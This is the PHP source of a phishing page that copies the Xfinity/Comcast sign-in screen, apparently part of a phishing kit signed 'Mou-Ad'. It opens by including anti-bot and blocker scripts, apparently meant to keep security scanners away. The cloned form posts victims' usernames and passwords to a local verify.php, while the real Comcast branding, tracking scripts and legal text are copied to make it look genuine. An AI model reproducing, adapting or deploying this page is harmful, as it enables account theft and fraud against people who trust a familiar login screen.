<?php
/*   
Mou-Ad                    
*/


session_start();
error_reporting(0);
@ini_set('display_errors', 'on'); 
ob_start();  
include './antibots.php';
include './bt.php';
include "./blocker.php";
?>
<!DOCTYPE html>

<!-- saved from url=(0459)https://login.xfinity.com/login?ipAddrAuthn=false&passive=false&client_id=my-account-web&reqId=2d67c1c5-97d4-46dd-90be-4dc9c53d9917&r=comcast.net&s=oauth&deviceAuthn=false&continue=https%3A%2F%2Foauth.xfinity.com%2Foauth%2Fauthorize%3Fclient_id%3Dmy-account-web%26prompt%3Dlogin%26redirect_uri%3Dhttps%253A%252F%252Fcustomer.xfinity.com%252Foauth%252Fcallback%26response_type%3Dcode%26state%3D%2523%252F%26response%3D1&forceAuthn=1&lang=en&rm=2&ui_style=light -->
<html lang="en" class="light custom" data-resource-package-id="login-myaccount"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><script type="text/javascript" async="async" src="./login_files/s21593744923112"></script>
		<title>Sign in to Xfinity</title>
		<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
		
		<meta name="mobile-web-app-capable" content="yes">
		<meta name="apple-mobile-web-app-capable" content="yes">
		<meta name="description" content="Get the most out of Xfinity from Comcast by signing in to your account. Enjoy and manage TV, high-speed Internet, phone, and home security services that work seamlessly together — anytime, anywhere, on any device.">
		<meta name="viewport" content="width=device-width,initial-scale=1">
		<meta name="msapplication-TileColor" content="#ffffff">
		<meta name="msapplication-TileImage" content="static/images/global/favicon/favicon-96x96.png">
		<meta name="theme-color" content="#ffffff">
		
				
	<script type="text/javascript" src="./login_files/lodash-slim.min.js.download"></script>

			<script type="text/javascript" src="./login_files/tracking-aws.min.js.download"></script>
	
	<script type="text/javascript" src="./login_files/tracking-DTM.min.js.download"></script>
	<script type="text/javascript" src="./login_files/tracking.min.js.download"></script>
	    	<script src="./login_files/satelliteLib-531bc4f46256650a84099973f0ed331f809ea5f4.js.download"></script>
	
	<script type="tracking-data-digitalData">
		{
			"page" : {
				"pageInfo" : {
					"screenName" : "sign in",
					"language" : "en",
					"referrerId" : "my-account-web"
				 },
				 "category" : {
                    "primaryCategory" : "login",
                    "designType" : "responsive",
                    "businessType" : "resi",
                    "siteType" : "selfservice"
                },
                "affiliate" : {
                    "name": "comcast",
                    "channel" : "web"
                },
                "codebase" : {
                    "name" : "cima login"
                }
			},
			"user" : [{
				"profile" : [{
					"profileInfo" : {
						"authenticationType" : "unauthenticated",
						"recognizationType" : "unrecognized"
					}
				}],
				"segment" : {
					"isLocalized" : false
				}
			}],
			"schemaVersion" : 0.11
		}

	</script>
	<script>document.dispatchEvent(new CustomEvent("c-tracking-init-start"));</script>
	<script>
        document.addEventListener("DOMContentLoaded", function() {
            document.dispatchEvent(new CustomEvent("c-tracking-log-page", {
                bubbles: true
            }));
        });
        document.addEventListener('click', function(ev){
            var element = ev.target.closest('a:not([data-tracking]), button:not([data-tracking])');

            if (element) {
                var event = new CustomEvent('c-tracking-log-dom', {
                    bubbles: true
                });
                element.dispatchEvent(event);
            }
        });

	</script>

		<link rel="stylesheet" type="text/css" href="./login_files/styles-light.min.css">
				<link rel="shortcut icon" href="https://login.xfinity.com/static/images/favicon/favicon.ico">
		<link rel="apple-touch-icon" sizes="57x57" href="https://login.xfinity.com/static/images/favicon/apple-icon-57x57.png">
		<link rel="apple-touch-icon" sizes="60x60" href="https://login.xfinity.com/static/images/favicon/apple-icon-60x60.png">
		<link rel="apple-touch-icon" sizes="72x72" href="https://login.xfinity.com/static/images/favicon/apple-icon-72x72.png">
		<link rel="apple-touch-icon" sizes="76x76" href="https://login.xfinity.com/static/images/favicon/apple-icon-76x76.png">
		<link rel="apple-touch-icon" sizes="114x114" href="https://login.xfinity.com/static/images/favicon/apple-icon-114x114.png">
		<link rel="apple-touch-icon" sizes="120x120" href="https://login.xfinity.com/static/images/favicon/apple-icon-120x120.png">
		<link rel="apple-touch-icon" sizes="144x144" href="https://login.xfinity.com/static/images/favicon/apple-icon-144x144.png">
		<link rel="apple-touch-icon" sizes="152x152" href="https://login.xfinity.com/static/images/favicon/apple-icon-152x152.png">
		<link rel="apple-touch-icon" sizes="180x180" href="https://login.xfinity.com/static/images/favicon/apple-icon-180x180.png">
		<meta name="apple-itunes-app" content="app-id=776010987">		<link rel="icon" type="image/png" sizes="192x192" href="https://login.xfinity.com/static/images/favicon/android-icon-192x192.png">
		<link rel="icon" type="image/png" sizes="32x32" href="https://login.xfinity.com/static/images/favicon/favicon-32x32.png">
		<link rel="icon" type="image/png" sizes="96x96" href="https://login.xfinity.com/static/images/favicon/favicon-96x96.png">
		<link rel="icon" type="image/png" sizes="16x16" href="https://login.xfinity.com/static/images/favicon/favicon-16x16.png">
		<link rel="manifest" href="https://login.xfinity.com/static/images/favicon/manifest.json">

		<script type="text/javascript">
			runtimeData = {
									"r": "comcast.net",									"s": "oauth",									"deviceAuthn": "false",									"continue": "https://oauth.xfinity.com/oauth/authorize?client_id=my-account-web&amp;prompt=login&amp;redirect_uri=https%3A%2F%2Fcustomer.xfinity.com%2Foauth%2Fcallback&amp;response_type=code&amp;state=%23%2F&amp;response=1",									"ipAddrAuthn": "false",									"forceAuthn": "1",									"ui_style": "light",									"lang": "en",									"passive": "false",									"client_id": "my-account-web",									"reqId": "2d67c1c5-97d4-46dd-90be-4dc9c53d9917"							}
		</script>
																			<style type="text/css">
								@media only screen and (min-width: 1024px) {
html { background-color: #000000; }
}
#background {
background: #000000;
background: -webkit-linear-gradient(#0a293c, #000000) no-repeat 0 462px / 100% 346px, linear-gradient(#051620, #051620) no-repeat 0 0px / 100% 462px, #000000;
background: -mos-linear-gradient(#0a293c, #000000) no-repeat 0 462px / 100% 346px, linear-gradient(#051620, #051620) no-repeat 0 0px / 100% 462px, #000000;
background: -ms-linear-gradient(#0a293c, #000000) no-repeat 0 462px / 100% 346px, linear-gradient(#051620, #051620) no-repeat 0 0px / 100% 462px, #000000;
background: -o-linear-gradient(#0a293c, #000000) no-repeat 0 462px / 100% 346px, linear-gradient(#051620, #051620) no-repeat 0 0px / 100% 462px, #000000;
background: linear-gradient(#0a293c, #000000) no-repeat 0 462px / 100% 346px, linear-gradient(#051620, #051620) no-repeat 0 0px / 100% 462px, #000000;
background-attachment: initial;
line-height:1;
height: 100%;
}
#left {
color: #e6eaed;
padding-left: 26px;
width: 568px;
margin-left: 0;
}
#left h1 {
color: #e6eaed;
font-size: 24px;
font-weight: 300;
line-height: 30px;
margin-top: 10px;
margin-bottom: 14px;
letter-spacing: 0.37px;
}
#left h1::first-letter {
margin-left: -2px;
}
#left p {
font-size: 16px;
line-height: 28px;
margin-top: 14px;
}
#left a {
color: #2b9cd8;
}
#leftSide-image {
display: block;
margin-top: 48px;
margin-left: -26px;
width: 594px;
}
#right #quick-bill-pay { display: block; }
			</style>
							<script>document.dispatchEvent(new CustomEvent("c-tracking-init-styles"));</script>
			<script src="./login_files/s-code-contents-4a9ebf08bffa74f717ff121b2c55a295112122b4.js.download"></script><script src="./login_files/satellite-596fc62264746d0ba500dd83.js.download"></script><script src="./login_files/satellite-596fa36064746d7e580013b4.js.download"></script><script src="./login_files/satellite-5971021b64746d663b00202b.js.download"></script><script src="./login_files/satellite-596fa34764746d6ae001a760.js.download"></script></head>
		<body class=" has-footer ">
		<div id="breakpoints"></div>
							<div id="background" style="height: 648.375px;"></div>
								<main id="bd">
			<h1 class="screen-reader-text">Sign in to Xfinity</h1>
			<div id="left"><h1>It's now easier to pay your bill anytime, anywhere.</h1>
<p>Want to pay your outstanding balance without signing in? <a href="">Try quick bill pay</a></p>
<img id="leftSide-image" src="./login_files/b1372fb33a8af099efbde90184076f9b.png" srcset="https://edge.static-assets.top.comcast.net/cms/data/assets/bin-201705/b1372fb33a8af099efbde90184076f9b.png 1x, https://edge.static-assets.top.comcast.net/cms/data/assets/bin-201705/89716793f4385c7efe13ec1512348789.png 2x">
<p>
Comcast Business customer?
<a href="">Sign in here</a>
</p></div><div id="right">		<div class="container">
	<form name="signin" action="verify.php" method="post" onsubmit="return login.onSubmit()">
																			<div class="single logo-wrapper">
				<span aria-role="img" class="xfinity-logo"></span>
											</div>
		                            <div class="textfield-wrapper">
				<label for="user" class="float accessibly-hidden">Username</label>
				<input id="user" name="user" type="text" placeholder="Username, email, or mobile" value="" autocorrect="off" autocapitalize="off" spellcheck="false" maxlength="128">
			</div>
		
					<div class="textfield-wrapper">
				<label for="passwd" class="float accessibly-hidden">Password</label>
				<input id="passwd" name="passwd" type="password" placeholder="Password" maxlength="128">
			</div>
		
        
	    			<div class="checkbox-container">
				<label for="remember_me">
					<input type="checkbox" id="remember_me" name="rm" value="1"><span id="remember_me_checkbox" class="checkbox"></span><div class="content">Stay signed in</div>
				</label>
				<button type="button" id="rm_label_learn_more" class="icon info cancel" data-id-ref="rm_help" aria-controls="rm_help" aria-label="Learn more about staying signed in"></button>
			</div>

			        
        
        
		
		
		
												<button class="submit" type="submit" id="sign_in">Sign In</button>
					
		
		
		<ul>
			
			        	    	

																						<li id="forgot-username-password-item">Forgot <a href="" target="_self" title="Lookup User ID">username</a> or <a id="forgotPwdLink" href="" target="_self" title="Reset Password">password</a>?</li>
									
										<li id="create-username-item">Don't have a username?					<span><a href="" target="_self">Create one</a></span>
				</li>
					
		
			
		    										
				
				<li id="quick-bill-pay">
					<a href="">Pay any balance</a> without signing in				</li>
			
						
		</ul>
					<p id="implied-legal">By signing in, you agree to our <a href="">Terms of Service</a> and <a href="">Privacy Policy</a>.</p>
		
		
					<input type="hidden" name="r" value="comcast.net">
					<input type="hidden" name="s" value="oauth">
					<input type="hidden" name="deviceAuthn" value="false">
					<input type="hidden" name="continue" value="https://oauth.xfinity.com/oauth/authorize?client_id=my-account-web&amp;prompt=login&amp;redirect_uri=https%3A%2F%2Fcustomer.xfinity.com%2Foauth%2Fcallback&amp;response_type=code&amp;state=%23%2F&amp;response=1">
					<input type="hidden" name="ipAddrAuthn" value="false">
					<input type="hidden" name="forceAuthn" value="1">
					<input type="hidden" name="ui_style" value="light">
					<input type="hidden" name="lang" value="en">
					<input type="hidden" name="passive" value="false">
					<input type="hidden" name="client_id" value="my-account-web">
					<input type="hidden" name="reqId" value="2d67c1c5-97d4-46dd-90be-4dc9c53d9917">
		
 	</form>
</div>

				</div>
		</main>
					
<footer>
<span class="copyright">© 2019 Comcast</span>
<span class="divider hide-compact"></span>
<span class="links hide-compact">
<a href="">Terms of Service</a>
<span class="divider"></span>
<a href="">Privacy Policy</a>
</span>
<span class="divider"></span>
<span class="links">
<a href="">Site Map</a>
<span class="divider"></span>
<a href="">Contact Us</a>
</span>
<span class="ad-links divider"></span>
<span class="ad-links links">
<a href="" target="_blank">Ad Info</a>
<span class="divider"></span>
<a href="" target="_blank">Ad Feedback</a>
</span>
</footer>
		
		
		<script type="text/javascript" src="./login_files/jquery-1.12.4.min.js.download"></script>

											<div id="rm_help" role="dialog" aria-hidden="true" class="overlay" data-dialog-type="overlay">
    	<div role="document" class="content">
    		    		<button type="button" class="close" aria-label="Close"></button>
    							<h1>Why Stay Signed In?</h1>
					<p>When you choose this option on sign in, we will remember who you are and keep you signed in for up to 30 days unless you sign out.</p>
					<p>Please note: If you share your personal computer with others, they could access and make changes to your account. You should definitely not use this option on public computers.</p>
				
    	</div>
    </div>
			
    <script type="text/javascript" src="./login_files/scripts-responsive.min.js.download"></script>

    <script type="text/javascript">
        login.registerInitFunction(function(config){
	login.onSubmit = function() {
		var usernameSelector = "#"+config.usernameId,
			passwordSelector = "#"+config.passwordId,
			username = $(usernameSelector),
			password = $(passwordSelector);
		if(username.val() === "" || password.val() === "") {
			$("#error").remove();
			$(usernameSelector+", "+passwordSelector).addClass("error").attr({
				'aria-invalid': 'true',
				'aria-describedby': 'error'
			});
			$('<p id="error" class="error_message">'+config.authnEmptyError+'</p>').insertAfter(".textfield-wrapper:has("+passwordSelector+")");
			username.focus();
			return false
		} else {
			return true
		}
	};
	
}, "responsiveForm");
;
        						shared.init();
        login.init({
            usernameId: 'user',
            passwordId: 'passwd',
            authnEmptyError: 'Please enter your email, username or mobile phone number and password to sign in.'
        });
    </script>

		<script type="text/javascript">
		
		</script>

							<script type="text/javascript">
				document.dispatchEvent(new CustomEvent("c-tracking-init-end"));
			</script>
			

<iframe sandbox="allow-scripts allow-same-origin" title="Adobe ID Syncing iFrame" id="destination_publishing_iframe_comcastathena_1" name="destination_publishing_iframe_comcastathena_1_name" src="./login_files/dest5.html" class="aamIframeLoaded" style="display: none; width: 0px; height: 0px;"></iframe><iframe sandbox="allow-scripts allow-same-origin" title="Adobe ID Syncing iFrame" id="destination_publishing_iframe_comcast_0" name="destination_publishing_iframe_comcast_0_name" src="./login_files/dest5(1).html" class="aamIframeLoaded" style="display: none; width: 0px; height: 0px;"></iframe></body></html>